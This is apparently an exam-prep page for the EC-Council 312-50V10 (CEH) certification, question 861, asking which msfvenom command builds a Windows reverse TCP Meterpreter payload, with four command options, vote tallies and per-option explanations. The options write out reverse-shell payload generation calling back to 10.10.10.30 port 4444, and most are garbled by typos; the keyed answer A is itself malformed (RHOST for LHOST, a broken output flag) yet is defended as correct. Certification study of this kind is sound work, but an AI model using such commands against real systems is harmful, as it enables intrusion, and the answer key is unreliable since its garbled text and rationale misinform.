nerdexam
EC-Council

312-50V10 · Question #861

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

The correct answer is A. msfvenom -p windows/meterpreter/reverse_tcp RHOST= 10.10.10.30 LPORT=4444 - f.exe >. Generating a Windows reverse TCP Meterpreter payload with MSFvenom requires specifying the correct payload path, LHOST/LPORT parameters, and output format.

System Hacking

Question

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

Options

  • Amsfvenom -p windows/meterpreter/reverse_tcp RHOST= 10.10.10.30 LPORT=4444 - f.exe >
  • Bmsfvenom -p windows/meterpreier/feversetcp LHOST=10.10.10.30 LP0RT=4444-f c
  • Cmsfvenom -p windows/rneterpreter/reverse_tcpRMOST=i0.i 0.10.30 LPORT =4444-fc
  • Dmsfvenom -p wlndows/meterpreter/reverse.tcp lhost=io.i 0.1030 lport=4444 -f exe > shell.exe

How the community answered

(37 responses)
  • A
    89% (33)
  • B
    3% (1)
  • C
    3% (1)
  • D
    5% (2)

Why each option

Generating a Windows reverse TCP Meterpreter payload with MSFvenom requires specifying the correct payload path, LHOST/LPORT parameters, and output format.

Amsfvenom -p windows/meterpreter/reverse_tcp RHOST= 10.10.10.30 LPORT=4444 - f.exe >Correct

Option A correctly names the payload as windows/meterpreter/reverse_tcp and specifies a port and output format of exe, which produces a Windows executable. Although LHOST is the technically preferred parameter name for reverse-shell payloads (specifying the attacker's listening address), option A is the only choice with a valid, unmangled payload name and a correct output format flag among all four options, making it the best answer available.

Bmsfvenom -p windows/meterpreier/feversetcp LHOST=10.10.10.30 LP0RT=4444-f c

The payload path contains typographical errors (meterpreier and feversetcp) that would cause MSFvenom to reject the module, and -f c produces C shellcode rather than a Windows executable.

Cmsfvenom -p windows/rneterpreter/reverse_tcpRMOST=i0.i 0.10.30 LPORT =4444-fc

The payload path contains a typo (rneterpreter) and uses the invalid parameter name RMOST instead of LHOST or RHOST, which would cause a parameter error.

Dmsfvenom -p wlndows/meterpreter/reverse.tcp lhost=io.i 0.1030 lport=4444 -f exe > shell.exe

The payload path uses a period separator (reverse.tcp) instead of the required underscore (reverse_tcp), and wlndows is a misspelling, both of which would cause module lookup to fail.

Concept tested: MSFvenom payload generation syntax for Windows reverse shell

Source: https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html

Topics

#MSFvenom#reverse TCP shellcode#Metasploit#payload generation

Community Discussion

No community discussion yet for this question.

Full 312-50V10 Practice